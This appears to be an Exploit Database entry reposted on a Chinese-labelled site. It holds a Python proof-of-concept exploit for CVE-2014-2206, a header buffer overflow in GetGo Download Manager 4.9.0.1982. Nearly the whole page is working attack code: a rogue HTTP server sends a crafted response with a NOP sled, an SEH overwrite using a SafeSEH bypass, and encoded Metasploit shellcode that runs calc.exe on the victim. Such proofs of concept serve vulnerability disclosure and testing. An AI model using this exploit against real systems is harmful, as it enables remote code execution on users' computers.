GetGo Download Manager 4.9.0.1982 – HTTP Response Header Buffer Overflow Remote Code Execution

• Exploit Database
• 17 阅读

• 作者： Julien Ahrens
  日期： 2014-03-09
• 类别：

  • remote
  平台：

  • windows
• 来源：https://www.exploit-db.com/exploits/32132/

• #!/usr/bin/python
  # Exploit Title: GetGo Download Manager HTTP Response Header Buffer Overflow Remote Code Execution
  # Version: v4.9.0.1982
  # CVE: CVE-2014-2206
  # Date:2014-03-09
  # Author:Julien Ahrens (@MrTuxracer)
  # Homepage:http://www.rcesecurity.com
  # Software Link: http://www.getgosoft.com
  # Tested on: WinXP SP3-GER 
  #
  # Howto / Notes:
  # SEH overwrite was taken from outside of loaded modules, because all modules are SafeSEH-enabled
  #
  
  from socket import *
  from time import sleep
  from struct import pack
   
  host = "192.168.0.1"
  port = 80
   
  s = socket(AF_INET, SOCK_STREAM)
  s.bind((host, port))
  s.listen(1)
  print "\n[+] Listening on %d ..." % port
   
  cl, addr = s.accept()
  print "[+] Connection accepted from %s" % addr[0]
   
  junk0 = "\x90" * 4107
  nseh = "\x90\x90\xEB\x06"
  seh=pack('<L',0x00280b0b)# call dword ptr ss:[ebp+30] [SafeSEH Bypass]
  nops = "\x90" * 50
  
  # windows/exec CMD=calc.exe 
  # Encoder: x86/shikata_ga_nai
  # powered by Metasploit 
  # msfpayload windows/exec CMD=calc.exe R | msfencode -b '\x00\x0a\x0d'
  
  shellcode = ("\xda\xca\xbb\xfd\x11\xa3\xae\xd9\x74\x24\xf4\x5a\x31\xc9" +
  "\xb1\x33\x31\x5a\x17\x83\xc2\x04\x03\xa7\x02\x41\x5b\xab" +
  "\xcd\x0c\xa4\x53\x0e\x6f\x2c\xb6\x3f\xbd\x4a\xb3\x12\x71" +
  "\x18\x91\x9e\xfa\x4c\x01\x14\x8e\x58\x26\x9d\x25\xbf\x09" +
  "\x1e\x88\x7f\xc5\xdc\x8a\x03\x17\x31\x6d\x3d\xd8\x44\x6c" +
  "\x7a\x04\xa6\x3c\xd3\x43\x15\xd1\x50\x11\xa6\xd0\xb6\x1e" +
  "\x96\xaa\xb3\xe0\x63\x01\xbd\x30\xdb\x1e\xf5\xa8\x57\x78" +
  "\x26\xc9\xb4\x9a\x1a\x80\xb1\x69\xe8\x13\x10\xa0\x11\x22" +
  "\x5c\x6f\x2c\x8b\x51\x71\x68\x2b\x8a\x04\x82\x48\x37\x1f" +
  "\x51\x33\xe3\xaa\x44\x93\x60\x0c\xad\x22\xa4\xcb\x26\x28" +
  "\x01\x9f\x61\x2c\x94\x4c\x1a\x48\x1d\x73\xcd\xd9\x65\x50" +
  "\xc9\x82\x3e\xf9\x48\x6e\x90\x06\x8a\xd6\x4d\xa3\xc0\xf4" +
  "\x9a\xd5\x8a\x92\x5d\x57\xb1\xdb\x5e\x67\xba\x4b\x37\x56" +
  "\x31\x04\x40\x67\x90\x61\xbe\x2d\xb9\xc3\x57\xe8\x2b\x56" +
  "\x3a\x0b\x86\x94\x43\x88\x23\x64\xb0\x90\x41\x61\xfc\x16" +
  "\xb9\x1b\x6d\xf3\xbd\x88\x8e\xd6\xdd\x4f\x1d\xba\x0f\xea" +
  "\xa5\x59\x50")
  
  payload = junk0 + nseh + seh + nops + shellcode
  
  buffer = "HTTP/1.1 200 "+payload+"\r\n"
   
  print cl.recv(1000)
  cl.send(buffer)
  print "[+] Sending buffer: OK\n"
  
  sleep(3)
  cl.close()
  s.close()